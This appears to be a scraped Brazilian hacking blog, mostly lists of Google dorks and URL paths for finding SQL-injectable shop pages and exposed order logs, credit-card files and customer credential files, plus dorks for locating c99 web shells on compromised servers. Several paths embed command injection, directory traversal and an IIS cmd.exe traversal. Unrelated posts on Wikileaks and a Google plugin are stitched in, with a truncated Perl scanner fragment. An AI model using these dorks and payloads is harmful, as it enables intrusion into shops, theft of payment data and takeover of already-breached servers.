inurl:"checkout_confirmed.asp?order_id="
inurl:"checkout1.asp?cartid="
inurl:"comersus_listCategoriesAndProducts.asp?idCategory ="
inurl:"comersus_optEmailToFriendForm.asp?idProduct="
inurl:"comersus_optReviewReadExec.asp?idProduct="
inurl:"comersus_viewItem.asp?idProduct="
inurl:"comments_form.asp?ID="
inurl:"contact.asp?cartId="
inurl:"content.asp?id="
inurl:"customerService.asp?TextID1="
inurl:"default.asp?catID="
inurl:"description.asp?bookid="
inurl:"details.asp?BookID="
inurl:"details.asp?Press_Release_ID="
inurl:"details.asp?Product_ID="
inurl:"details.asp?Service_ID="
inurl:"display_item.asp?id="
inurl:"displayproducts.asp"
inurl:"downloadTrial.asp?intProdID="
inurl:"emailproduct.asp?itemid="
inurl:"emailToFriend.asp?idProduct="
inurl:"events.asp?ID="
inurl:"faq.asp?cartID="
inurl:"faq_list.asp?id="
inurl:"faqs.asp?id="
inurl:"feedback.asp?title="
inurl:"freedownload.asp?bookid="
inurl:"fullDisplay.asp?item="
inurl:"getbook.asp?bookid="
inurl:"GetItems.asp?itemid="
inurl:"giftDetail.asp?id="
inurl:"help.asp?CartId="
inurl:"home.asp?id="
inurl:"index.asp?cart="
inurl:"index.asp?cartID="
inurl:"index.asp?ID="
inurl:"info.asp?ID="
inurl:"item.asp?eid="
inurl:"item.asp?item_id="
inurl:"item.asp?itemid="
inurl:"item.asp?model="
inurl:"item.asp?prodtype="
inurl:"item.asp?shopcd="
inurl:"item_details.asp?catid="
inurl:"item_list.asp?maingroup"
inurl:"item_show.asp?code_no="
inurl:"itemDesc.asp?CartId="
inurl:"itemdetail.asp?item="
inurl:"itemdetails.asp?catalogid="
inurl:"learnmore.asp?cartID="
inurl:"links.asp?catid="
inurl:"list.asp?bookid="
inurl:"List.asp?CatID="
inurl:"listcategoriesandproducts.asp?idCategory="
inurl:"modline.asp?id="
inurl:"myaccount.asp?catid="
inurl:"news.asp?id="
inurl:"order.asp?BookID="
inurl:"order.asp?id="
inurl:"order.asp?item_ID="
inurl:"OrderForm.asp?Cart="
inurl:"page.asp?PartID="
inurl:"payment.asp?CartID="
inurl:"pdetail.asp?item_id="
inurl:"powersearch.asp?CartId="
inurl:"privacy.asp?cartID="
inurl:"prodbycat.asp?intCatalogID="
inurl:"prodetails.asp?prodid="
inurl:"prodlist.asp?catid="
inurl:"product.asp?bookID="
inurl:"product.asp?intProdID="
inurl:"product_info.asp?item_id="
inurl:"productDetails.asp?idProduct="
inurl:"productDisplay.asp"
inurl:"productinfo.asp?item="
inurl:"productlist.asp?ViewType=Category&CategoryID= "
inurl:"productpage.asp"
inurl:"products.asp?ID="
inurl:"products.asp?keyword="
inurl:"products_category.asp?CategoryID="
inurl:"products_detail.asp?CategoryID="
inurl:"productsByCategory.asp?intCatalogID="
inurl:"prodView.asp?idProduct="
inurl:"promo.asp?id="
inurl:"promotion.asp?catid="
inurl:"pview.asp?Item="
inurl:"resellers.asp?idCategory="
inurl:"results.asp?cat="
inurl:"savecart.asp?CartId="
inurl:"search.asp?CartID="
inurl:"searchcat.asp?search_id="
inurl:"Select_Item.asp?id="
inurl:"Services.asp?ID="
inurl:"shippinginfo.asp?CartId="
inurl:"shop.asp?a="
inurl:"shop.asp?action="
inurl:"shop.asp?bookid="
inurl:"shop.asp?cartID="
inurl:"shop_details.asp?prodid="
inurl:"shopaddtocart.asp"
inurl:"shopaddtocart.asp?catalogid="
inurl:"shopbasket.asp?bookid="
inurl:"shopbycategory.asp?catid="
inurl:"shopcart.asp?title="
inurl:"shopcreatorder.asp"
inurl:"shopcurrency.asp?cid="
inurl:"shopdc.asp?bookid="
inurl:"shopdisplaycategories.asp"
inurl:"shopdisplayproduct.asp?catalogid="
inurl:"shopdisplayproducts.asp"
inurl:"shopexd.asp"
inurl:"shopexd.asp?catalogid="
inurl:"shopping_basket.asp?cartID="
inurl:"shopprojectlogin.asp"
inurl:"shopquery.asp?catalogid="
inurl:"shopremoveitem.asp?cartid="
inurl:"shopreviewadd.asp?id="
inurl:"shopreviewlist.asp?id="
inurl:"ShopSearch.asp?CategoryID="
inurl:"shoptellafriend.asp?id="
inurl:"shopthanks.asp"
inurl:"shopwelcome.asp?title="
inurl:"show_item.asp?id="
inurl:"show_item_details.asp?item_id="
inurl:"showbook.asp?bookid="
inurl:"showStore.asp?catID="
inurl:"shprodde.asp?SKU="
inurl:"specials.asp?id="
inurl:"store.asp?id="
inurl:"store_bycat.asp?id="
inurl:"store_listing.asp?id="
inurl:"Store_ViewProducts.asp?Cat="
inurl:"store-details.asp?id="
inurl:"storefront.asp?id="
inurl:"storefronts.asp?title="
inurl:"storeitem.asp?item="
inurl:"StoreRedirect.asp?ID="
inurl:"subcategories.asp?id="
inurl:"tek9.asp?"
inurl:"template.asp?Action=Item&pid="
inurl:"topic.asp?ID="
inurl:"tuangou.asp?bookid="
inurl:"type.asp?iType="
inurl:"updatebasket.asp?bookid="
inurl:"updates.asp?ID="
inurl:"view.asp?cid="
inurl:"view_cart.asp?title="
inurl:"view_detail.asp?ID="
inurl:"viewcart.asp?CartId="
inurl:"viewCart.asp?userID="
inurl:"viewCat_h.asp?idCategory="
inurl:"viewevent.asp?EventID="
inurl:"viewitem.asp?recor="
inurl:"viewPrd.asp?idcategory="
inurl:"ViewProduct.asp?misc="
inurl:"voteList.asp?item_ID="
inurl:"whatsnew.asp?idCategory="
inurl:"WsAncillary.asp?ID="

/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&ac count=administrator
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/webcart-lite/orders/import.txt
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
/_private/orders.htm
/orders/mountain.cfg
/PDG_Cart/shopper.config
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp&Board=6210&Idle=10&Sort=0&Order=Des cend&Page=0&Session=;;;
/_private/shopping_cart.mdb
/cgi-bin/shopper.cgi
/cgi-bin/shop.cgi
/cgi-bin/perlshop.cgi
/cgi-bin/mall2000.cgi
/log/
/logfile/
/logfiles/
/logger/
/logging/
/logs/
/logs/access_log
/weblog/
/weblogs/
/cgi-bin/loadpage.cgi
/database/
/databases/
/cgi-bin/Web_Store/web_store.cgi
/scripts/cart32.exe
/scripts/c32web.exe
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&templa te=order.log
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template= order.log
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;c at%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
/ccbill/secure/ccbill.log
/cgibin/shopper.cgi?search=action&keywords=moron&template= order.csv
/order13.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin/PDG_Cart/order.log
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&templa te=order.log
/orders/db/zzzbizorders.log.html
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&templ ate=other
isinglogorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/cgi-bin/shopper.exe?preadd=action&key=bajk390ss&template=o rder.log
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/cart32/CART32-order.txt
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/cgi-bin/cart32.ini
/cgi-bin/cart32.exe/cart32clientlist
/cgi-bin/cart32.exe/error
/metacart/database/metacart.mdb
//shopping/database/metacart.mdb
/shopping/database/metacart.mdb
/fpdb/shop.mdb
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=order. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sales. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=sell.l og
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin. log
/cgi-bin/shopper.exe?key=8360&preadd=action&template=admin_ files.log
/cgi-bin/shopper.cgi?keywords=usstick&search=action&templat e=order.log
/cgi-bin/shopper.cgi?keywords=psiber&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=9461&search=action&template=o rder.log
/cgi-bin/shopper.cgi?keywords=SC7021&search=action&template =order.log
/cgi-bin/shopper.cgi?keywords=cc&search=action&template=ord er.log
/cgi-bin/shopper.cgi?keywords=order&search=action&template= order.log
/cgi-bin/shopper.cgi?display=action&template=order.log
/cgi-bin/shopper.cgi?search=action&keywords=moron%20&templa te=shopper.conf
/Merchant2/modules/log/elf.mv?search=action&ORDERLOG.txt
/Merchant2/modules/log/malf.mv?search=action&ORDERLOG.txt
/cgi-bin/shopper.exe?search=action&keywords=CD006&template= sales.log
/cgi-bin/shopper.exe?search=action&keywords=***&template=se ll.log
/cgi-bin/shopper.exe?search=action&keywords=order&template= admin.log
/cgi-bin/shopper.exe?search=action&keywords=cc&template=adm in_files.log
/cgi-bin/shopper.exe?search=action&keywords=hack&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=9400&template=o rder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template =order.log
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/shopper.cgi?search=action&keywords=root%20&templat e=order.log
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order. log
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/worlddirect/Web_store/Admin_files/order.log
/website/
/WebShop/templates/cc.txt
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/logs/
/WebShop/
/WebCart/orders.txt
/webcart/
/Web_store/Admin_files/order.log
/STORE/orders.txt
/stats/08-hosts.htm&TEMPLATE=ORDER.LOG
/PSUser/PSCOErrPage.htm
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/PDG/order.txt
/orders/results
/Orders/orders.txt
/orders/order.log
/orders/mountain.cf
/orders/import.txt
/orders/import.txt
/orders/checks.txt
/orders/
/orders.txt
/orders.htm
/orderform/orders.txt
/order.txt
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=orde r.log
/cgi-local/medstore/loadpage.cgi?user_id=id&file=data/orders.txt
/cgi-bin/shopper.exe?search=action&keywords=%20&template=sh opper.conf
/cgi-bin/shopper.exe
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/perlshop.cgi
/cgi-bin/PDG_Cart/cc.log
/cgi-bin/orders/mc.txt
/cgi-bin/orders/cc.txt
/cgi-bin/orders.txt
/cgi-bin/orderlog.txt
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txt
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtm
/cgi-bin/ezmall2000/mall_log_files/order.log
/cgi-bin/cart32/mainframephotographics-ORDERS.txt
/cgi-bin/cart32/CART32-order.txt
/cgi-bin/cart.pl
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AdvWorks/equipment/catalog_type.asp
/Admin_files/order.log
/admin/Orders/orders.txt

sexta-feira, 25 de fevereiro de 2011

SCANNER SQLI ONLINE - GOOGLE INURL BRASIL

Scanner SQLI Google INURL Brasil, utilizando dork simples resultados imediatos sem riscos de virus e 100% gratuito.
uso indevido responsabilidade do usuario todo conteúdo com fins de estudo.

O que você sabe sobre o Wikileaks?

Julian Assange, fundador da instituição (WikiLeaks), procura se estabelecer na Suécia pelas suas leis de proteção a jornalistas, então é acusado de crimes sexuais e teve de deixar o país.

O site WikiLeaks sofreu ataques do tipo DDoS (Denial of Service), que fizeram com que ficasse fora de funcionamento por muitas horas.

Depois dos ataques DDos, a WikiLeaks contratou serviços da Amazon que poderiam tratar adequadamente dos ataques, mas a Amazon rompeu contrato e expulsou a WikiLeaks de seus domínios.

O serviço que redireciona os usuários (DNS) para os servidores da WikiLeaks foi desativado, fazendo assim com que o domínio original “wikileaks.org” não funcional.

A Suécia emite um mandado de prisão contra Julian Assange.

A Interpol (polícia internacional, representada em 188 países) emite um alerta vermelho contra Julian Assange, o que significa que ele deve ser preso se encontrado.

O serviço de pagamentos eletrônicos no qual a WikiLeaks utilizava para receber fundos de todo o mundo, congela a conta da instituição, deixando retidos 70 mil euros.

A Suécia congela a conta bancária de Julian Assange.

Julian Assange é preso na Inglaterra.

Julian Assange tem pedido de fiança negado.

O serviço alternativo de transferência de fundos para WikiLeaks que utiliza cartão de crédito (Visa Mastercard) é cancelado.

Ataques verbais a instituição WikiLeaks e seu fundador Julian Assange, inclusive com incitação a violência contra os mesmos.

O site do grupo de hackers favoráveis a WikiLeaks denominado Anonops foi retirado de funcionamento (anonops.net).

O perfil no Twitter do grupo Anonops foi excluído.

O perfil do Facebok do grupo Anonops foi excluído.

A página com manual do grupo Anonops foi excluído.

O endereço temporário anonops.info foi excluido.

Dois adolecentes que apoiaram as operações PayBack foram presos na Suécia.

Força Área americana bloqueia acesso de algumas instituições e pessoas a WikiLeaks.

EUA iniciam operação para prender Assange.

EUA prendem manifestantes pró WikiLeaks em Washington.

Bank of America inicia operação contra WikiLeaks.

CIA cria esquadrão para combater WikiLeaks.

EUA obrigam o Twitter a revelar informações de usuários da conta WikiLeaks.

WikiLeaks Brasil tem duas vezes tentativas de seqüestro de seus serviços de e-mail.

Ex banqueiro que entregou dados a WikiLeaks é acusado na Suíça.

O grupo AnonOps sofre ataques da mídia quanto a responsabilidade de suas ações.

Governo Britânico prende 5 pessoas por apoiar WikiLeaks.

Estatísticas

6 Ataques a infra estrutura.
4 Ataques a mobilização financeira.
17 Ataques contra liberdade individual.
7 Ataques a entidades de apoio.

Google Cloud Connect é um plugin grátis que leva o Google Docs ao Microsoft Office do Windows.

Por Matheus Gonçalves

Não é novidade para ninguém que a Google Inc. tem uma forte tendência ao cloud computing. Eles lançaram hoje uma ferramenta chamada Google Cloud Connect, que permite acesso aos arquivos armazenados no Google Docs (totalmente nas nuvens) a partir do Microsoft Office, de qualquer PC ou gadget móvel.

Google Cloud Connect é um plugin grátis que leva o Google Docs ao Microsoft Office do Windows.

A tecnologia já tinha sido apresentada ao público no final do ano passado, como divulgado pelo site WinAjuda, mas o download do programa só foi disponibilizado hoje.

Segundo o blog oficial do Google Docs, o plugin é gratuito e funciona nas versões 2003, 2007 e 2010 do Microsoft Office para Windows.

Nos testes da Geek pudemos perceber que fica mantida a colaboração simultânea durante a edição de um documento, além do histórico de revisões e sincronização automática com o servidor remoto, desde que o computador esteja conectado à Internet.

Também é possível compartilhar um determinado arquivo diretamente a partir da interface dos aplicativos do Office, como demonstrado no vídeo de apresentação (goo.gl/hmgbU).

O blog ainda informa que o aplicativo só não está disponível ainda para Mac por que o pacote de aplicativos de escritório para este sistema operacional não suporta as APIs open-source da Google.

O download do plugin pode ser feito através do link goo.gl/kyJMV.

Fonte:http://toad.geek.com.br/posts/15097-google-cloud-connect-donwload-do-plugin-do-google-docs-para-microsoft-office-ja-esta-disponivel

domingo, 20 de fevereiro de 2011

Dork hacking para busca de c99

Para os espertinho que adoram um c99 safe off aé vai uma pequena lista de dork.

safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
download c99.php
download c99.php
download c99.php
inurl:c99.php
inurl:c99.php
allinurl: c99.php
inurl:c99.php
allinurl: c99.php
inurl:"/c99.php"
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
   inurl:c99.php uid=0(root)
   c99shell powered by admin
   c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php
inurl:"c99.php"
allinurl:c99.php
inurl:"/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:"c99.php"
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
allinurl:c99.php?
allinurl:c99.php?
allinurl:c99.php?
"inurl:c99..php"
allinurl:c99.php
   c99shell [file on secure ok ]?
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
   powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
inurl:c99.php
inurl:c99.php
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:"c99.php"
inurl:c99.php
inurl:c99.php
c99.php download
   inurl:c99.php
inurl:"c99.php"
inurl:/c99.php
inurl:"c99.php?"
inurl:c99.php
inurl:c99.php
files/c99.php
c99shell filetype:php -echo
c99shell powered by admin
inurl:c99.php
inurl:c99.php
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"c99.php"
inurl:"c99.php"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
inurl:c99.php
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
c99shell v. 1.0 pre-release build #16
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove

Logout
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
inurl:c99.php
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
   powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
"C99Shell v. 1.0 pre"
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
inurl:c99.php
inurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
intitle:"c99shell" filetype:php root
intitle:"c99shell" Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
inurl:"c99.php"
allintext:C99Shell v. 1.0 pre-release build #12
"C99Shell v. 1.0 pre"
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
allinurl:c99.php
intitle:C99Shell pre-release
inurl:"c99.php"
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release build #16!
allinurl:c99.php
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetype:php
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
allinurl:c99.php
"c99shell v. 1.0 pre-release build"
inurl:"c99.php" filetype:php
"c99shell v. 1.0 "
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
   c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
allinurl:/c99.php
powered by Captain Crunch Security Team
inurl:c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
powered by Captain Crunch Security Team
inurl:c99.php
C99Shell v. 1.0 pre-release
inurl:c99.php
inurl:c99.php ext:php
inurl:"c99.php"
allinurl:"c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
C99Shell v. 1.0 pre-release build #16 software apache
   Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
inurl:"c99.php"
allintitle: C99shell filetype:php
C99Shell v. 1.0 pre-release build #16!
"c99shell v. 1.0 pre-release"
c99shell v. 1.0 pre-release build #5
allinurl:"c99.php" filetype:php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
inurl:c99.php
c99shell v. 1.0
allinurl: c99.php
   --[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
inurl:"/c99.php"
c99shell +uname
c99shell php + uname
c99shell php + uname
--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
allinurl:c99.php
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php
intitle:c99shell filetype:php
"Encoder Tools Proc. FTP brute"
"c99" filetype:php intext:"Safe-Mode: OFF"
c99shell v. 1.0 pre
inurl:c99.php
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
c99.php "intitle:Index of "
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
   img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php

Páginas

Parceiro: Camisetas Hacker

domingo, 6 de março de 2011

Scanner dork em perl

if ($n == -1) {
last;
}
$c = substr($c, $n + 13);
$s = substr($c, 0, index($c, '"'));
print $s, "\n";
}
if ($check == -1) {
last;
}
}

Extrair emails com google

sábado, 26 de fevereiro de 2011

Netsparker: um scanner de segurança web livre de falsos-positivos

Netsparker: um scanner de segurança web livre de falsos-positivos

BANCO DE STRINGS

sexta-feira, 25 de fevereiro de 2011

